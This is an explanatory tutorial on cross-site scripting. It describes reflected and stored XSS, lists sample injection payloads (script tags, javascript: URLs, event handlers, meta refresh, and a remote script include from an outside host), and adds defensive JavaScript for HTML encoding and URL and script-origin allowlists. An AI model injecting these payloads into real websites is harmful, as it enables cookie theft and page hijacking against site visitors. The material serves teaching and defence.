Easy to understand XSS

Source: Internet
Author: User

What is XSS?

XSS (Cross-Site Scripting) is a common security vulnerability in web applications. It occurs when an application takes input from a user, does not validate or encode it, and writes it straight into the page it sends back to the browser. A script embedded in that input is then executed by the victim's browser in the context of the vulnerable site, with access to that site's cookies and DOM.

Classification of XSS

XSS is usually divided into non-persistent and persistent types, depending on whether the malicious input is only reflected back in the immediate response or is stored by the server and served to every later visitor.

1. Non-persistent, also known as reflected XSS. Data reaches the server through GET or POST, typically in the URL query string or in form fields. If the server does not filter, validate or encode that data and echoes it straight back to the client, reflected XSS results. Reflected XSS is the more common form and is generally considered less severe, because the victim has to be lured into sending the crafted request, for example by clicking a prepared link. Some reflected XSS can still have serious consequences: if <meta http-equiv="Refresh" content="5" /> is entered as the name in an input box and the server echoes it unprocessed, every browser that renders the page reloads it every 5 seconds, and in severe cases the repeated requests can overload the server.

2. Persistent, also known as stored XSS. The server stores user input containing a malicious script in the database without validating it, and renders it into the page every time the data is read back. The attack therefore persists: whenever another user views that page, the script runs in their browser and can steal their private information, such as session cookies.
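The reflected case described above, as an added example that is not part of the original article: a minimal "greeting" page renders the name parameter from the query string, first the vulnerable way (raw concatenation), then with output encoding for the HTML text context. The function names, the page template and the payload list are assumptions made for this illustration; the two payloads are the ones the article mentions.

```javascript
// Added example (not from the original article). Names and the page
// template are assumptions for illustration.

// Encode the five characters that can break out of HTML text or a
// double-quoted attribute value. '&' must be encoded first so that the
// entities produced by the later replacements are not re-encoded.
function escapeHtml(s) {
  return String(s)
    .replace(/&/g, "&amp;")
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;")
    .replace(/"/g, "&quot;")
    .replace(/'/g, "&#39;");
}

// Vulnerable: the user-controlled value is concatenated straight into the
// response, so any tag in it becomes part of the page.
function renderVulnerable(queryString) {
  const name = new URLSearchParams(queryString).get("name") ?? "";
  return `<html><body><h1>Hello, ${name}</h1></body></html>`;
}

// Hardened: same page, but the value is encoded for the HTML text context
// before it is inserted. The browser shows the payload as literal text.
function renderSafe(queryString) {
  const name = new URLSearchParams(queryString).get("name") ?? "";
  return `<html><body><h1>Hello, ${escapeHtml(name)}</h1></body></html>`;
}

// True if the rendered HTML contains a real <tagName ...> element. The
// encoder never emits a '<' followed by a tag name, so this tells the two
// renderings apart.
function containsInjectedTag(html, tagName) {
  return new RegExp(`<${tagName}[\\s>/]`, "i").test(html);
}

// Constructed payloads taken from the article's text: a forced refresh
// and a cookie read-out.
const PAYLOADS = [
  { tag: "meta", value: '<meta http-equiv="Refresh" content="5">' },
  { tag: "script", value: "<script>alert(document.cookie)</script>" },
];

// Run each payload through both renderers and report whether the tag
// survived as markup.
function demo() {
  return PAYLOADS.map(({ tag, value }) => {
    const qs = "name=" + encodeURIComponent(value);
    return {
      payload: value,
      executesInVulnerablePage: containsInjectedTag(renderVulnerable(qs), tag),
      executesInSafePage: containsInjectedTag(renderSafe(qs), tag),
    };
  });
}

for (const r of demo()) console.log(r);
```

A stored XSS differs only in where the value comes from: replace the query-string lookup with a read from the database and the two renderers behave exactly the same way, except that now every visitor receives the payload. The encoding shown is correct for HTML text and double-quoted attribute values; it is not sufficient on its own for values placed inside a URL attribute, a script block or an unquoted attribute.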

Common XSS injection vectors fall into the following types:

1. Entering a script tag directly in an input box (the leading > closes whatever tag the input lands in), such as:

><script>alert(document.cookie)</script>

2. Entering an HTML tag in the input box and embedding the script in one of its attributes, such as src, href or a CSS style. Note that javascript: URLs in a body background or in a CSS url() were only executed by old browsers (early Internet Explorer and Netscape); current browsers ignore them, but the same attributes still accept other dangerous values.

<body background="javascript:alert('XSS')">

<style>li {list-style-image:url("javascript:alert('XSS')");}</style><ul><li>XSS</br>

3. Injecting the script into an event handler attribute such as onclick, onblur or onmouseover. These still work in every current browser:

<a onmouseover="alert(document.cookie)">xsslink</a>

4. Loading the script from a remote style sheet or script file. The javascript: href on a link tag is another legacy-browser vector; the remote script include works everywhere, and the / in place of a space between the tag name and the attribute is accepted by HTML parsers and is used to evade naive filters that look for "<script ":

<link rel="stylesheet" href="javascript:alert('XSS');">

<script/src="http://ha.ckers.org/xss.js"></script>

5. META tags, such as a forced refresh or a Set-Cookie header (the latter is no longer honoured by current browsers, which removed support for http-equiv="Set-Cookie"):

<meta http-equiv="Refresh" content="5"/>

<meta http-equiv="Set-Cookie" content="userid=<script>alert('XSS')</script>">
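Vectors 2 and 4 above put the script in a URL-bearing attribute (href, src, background, url()). Entity encoding does not help there: javascript:alert(&#39;XSS&#39;) is decoded by the browser before the URL is parsed and still runs. A user-supplied URL therefore has to be validated as a URL before it is placed in such an attribute. The following is an added example, not code from the original article: a scheme allowlist for ordinary links, and an origin allowlist for script src, which a scheme check alone cannot protect because http://ha.ckers.org/xss.js is a perfectly valid http URL. The function names, allowlists and SITE_ORIGIN are assumptions for illustration.

```javascript
// Added example (not from the original article). The allowlists and
// SITE_ORIGIN below are assumptions for illustration.

// Browsers strip ASCII control characters and whitespace while parsing a
// URL, so "java\tscript:" and " javascript:" are both seen as javascript:.
// Normalise the same way before looking at the scheme.
function normalizeForScheme(url) {
  return String(url).replace(/[\u0000-\u0020\u007f]/g, "").toLowerCase();
}

const ALLOWED_SCHEMES = ["http:", "https:"];

// For href, background and similar attributes: accept a relative path or
// an allowed scheme; reject everything else (javascript:, data:,
// vbscript:, and protocol-relative //host which would change the origin).
function isSafeUrl(url) {
  const n = normalizeForScheme(url);
  const m = n.match(/^([a-z][a-z0-9+.-]*):/);
  if (!m) return !n.startsWith("//");
  return ALLOWED_SCHEMES.includes(m[1] + ":");
}

// For <script src>: only scripts from origins we control may be loaded.
// Relative paths are resolved against our own origin so "/static/app.js"
// is accepted but "//ha.ckers.org/xss.js" is not.
const SITE_ORIGIN = "https://www.example.com";
const ALLOWED_SCRIPT_ORIGINS = [SITE_ORIGIN, "https://cdn.example.com"];

function isAllowedScriptSrc(url) {
  let parsed;
  try {
    parsed = new URL(String(url), SITE_ORIGIN);
  } catch {
    return false; // unparsable: never emit it
  }
  // javascript: and data: URLs parse but have origin "null", so they fail here.
  return ALLOWED_SCRIPT_ORIGINS.includes(parsed.origin);
}

// Constructed inputs: the article's attribute payloads plus filter-evasion
// variants and a few legitimate values.
const URL_SAMPLES = [
  "javascript:alert('XSS')",
  "Javascript:alert('XSS')",
  "java\tscript:alert(1)",
  " javascript:alert(1)",
  "data:text/html,<script>alert(1)</script>",
  "//ha.ckers.org/xss.js",
  "http://ha.ckers.org/xss.js",
  "https://cdn.example.com/app.js",
  "/static/app.js",
  "HTTP://example.com/page",
];

function classify() {
  return URL_SAMPLES.map((u) => ({
    url: u,
    okForHref: isSafeUrl(u),
    okForScriptSrc: isAllowedScriptSrc(u),
  }));
}

for (const r of classify()) console.log(r);
```

Even with these checks the value still has to be attribute-encoded when written into the tag, and the attribute must be quoted; the URL check decides whether the value may be used at all, the encoder keeps it from closing the attribute.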

